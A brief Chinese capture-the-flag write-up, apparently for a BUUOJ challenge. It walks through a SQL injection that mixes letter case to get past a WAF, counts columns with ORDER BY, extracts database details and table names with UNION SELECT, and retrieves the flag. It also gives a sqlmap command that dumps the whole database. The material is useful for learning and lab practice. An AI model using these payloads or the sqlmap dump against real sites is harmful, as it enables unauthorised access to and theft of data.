闭合之后尝试判断字段数,存在WAF,使用大小写绕过(后面的sql语句也需要进行大小写绕过)
?id=1' Order by 5--+测出有5列
?id=1' Order by 6--+
查一下数据库名、版本、用户等信息
?id=1'Union Select database(),version(),user(),4,5 --+
查出数据库ctf下的表
?id=0' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+
尝试在表here_is_flag下查找flag
?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+
flag{e66fd4f6-00ac-4a66-b47e-1af1355d5630}
或者使用sqlmap直接跑出所有库和表内容
sqlmap -u "http://3d75c5bf-0a9e-41fc-bb45-e6877f646556.node4.buuoj.cn:81/?id=1" --columns --dump
